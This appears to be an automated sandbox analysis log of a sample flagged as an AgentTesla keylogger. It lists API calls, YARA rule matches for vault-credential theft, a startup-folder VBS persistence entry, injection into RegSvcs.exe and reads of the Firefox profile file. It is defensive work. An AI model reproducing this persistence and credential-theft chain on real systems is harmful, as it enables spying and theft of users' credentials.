                    Source: cunila.exe, 00000005.00000002.2189121086.00000000005E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_36ec0b64-0
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00883170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0091A2D7 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_009187B2 NtdllDialogWndProc_W,CallWindowProcW
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00918AAA NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00898BA4 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00918B02 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00918D0E PostMessageW,GetFocus,GetDlgCtrlID,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00918FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008990A7 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_009190A1 SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00899052 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0091911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00919380 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_009193CB NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00919400 ClientToScreen,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0091953A GetWindowLongW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00919576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008997C0 GetParent,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0089997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00919EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00919E74 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00919F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00523170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005BA2D7 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B87B2 NtdllDialogWndProc_W,CallWindowProcW
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B8AAA NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B8B02 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00538BA4 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B8D0E PostMessageW,GetFocus,GetDlgCtrlID,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B8FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00539052 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005390A7 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B90A1 SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B93CB NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B9380 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B9400 ClientToScreen,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B953A GetWindowLongW,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005397C0 GetParent,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0053997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B9E74 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B9EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B9F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008ED5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74745590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0058E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F2046
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00888060
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008E8298
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008BE4FF
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008B676B
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00914873
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008ACAA0
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0088CAF0
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0089CC39
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008B6DD9
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008891C0
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0089B119
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A1394
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A1706
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A781B
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A19B0
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00887920
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0089997D
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A7A4A
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A7CA7
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A1C77
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008B9EEE
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0090BE44
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A1F32
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_01395848
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00592046
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00528060
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00588298
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0055E4FF
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0055676B
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B4873
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0052CAF0
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0054CAA0
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0053CC39
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00556DD9
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0053B119
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005291C0
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00541394
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00541706
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0054781B
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0053997D
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00527920
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005419B0
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00547A4A
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00541C77
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00547CA7
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005ABE44
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00559EEE
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0052BF40
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00541F32
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_015CA408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00A1D4BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00A14A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00A1ECD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00A13E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00A141B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_051AC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_051AAD78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F52440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F566C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F5B318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F55270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F5C270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F57E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F5E478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F57770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F559C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F50033
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_05F50006
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 5_2_01327E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E141B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E14A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E1AD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E13E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0622C380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0622AAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062A5670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062A66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062A2440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062AC270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062AB318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062A7E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062A7770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062AE478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062A0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062A5DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_062A001F
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: String function: 00529CB3 appears 31 times
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: String function: 0053F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: String function: 00540A30 appears 46 times
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: String function: 008A0A30 appears 46 times
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: String function: 0089F9F2 appears 40 times
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: String function: 00889CB3 appears 31 times
Source: SAL987656700.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 2.2.cunila.exe.3970000.1.raw.unpack, KLhJmaON.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.cunila.exe.3970000.1.raw.unpack, KLhJmaON.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.cunila.exe.3970000.1.raw.unpack, 7hO8luD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.cunila.exe.3970000.1.raw.unpack, 7hO8luD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.cunila.exe.3970000.1.raw.unpack, 7hO8luD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.cunila.exe.3970000.1.raw.unpack, 7hO8luD.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.cunila.exe.3970000.1.raw.unpack, 9HIFdl.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.cunila.exe.3970000.1.raw.unpack, 9HIFdl.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/3@3/2
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F37B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008E10BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005810BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_0090A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\SAL987656700.exe | File created: C:\Users\user\AppData\Local\enterogenous
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\SAL987656700.exe | File created: C:\Users\user\AppData\Local\Temp\gunfights
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\SAL987656700.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SAL987656700.exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\SAL987656700.exe | File read: C:\Users\user\Desktop\SAL987656700.exe
Source: unknown | Process created: C:\Users\user\Desktop\SAL987656700.exe "C:\Users\user\Desktop\SAL987656700.exe"
Source: C:\Users\user\Desktop\SAL987656700.exe | Process created: C:\Users\user\AppData\Local\enterogenous\cunila.exe "C:\Users\user\Desktop\SAL987656700.exe"
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SAL987656700.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\enterogenous\cunila.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe"
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe"
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SAL987656700.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: winmm.dll
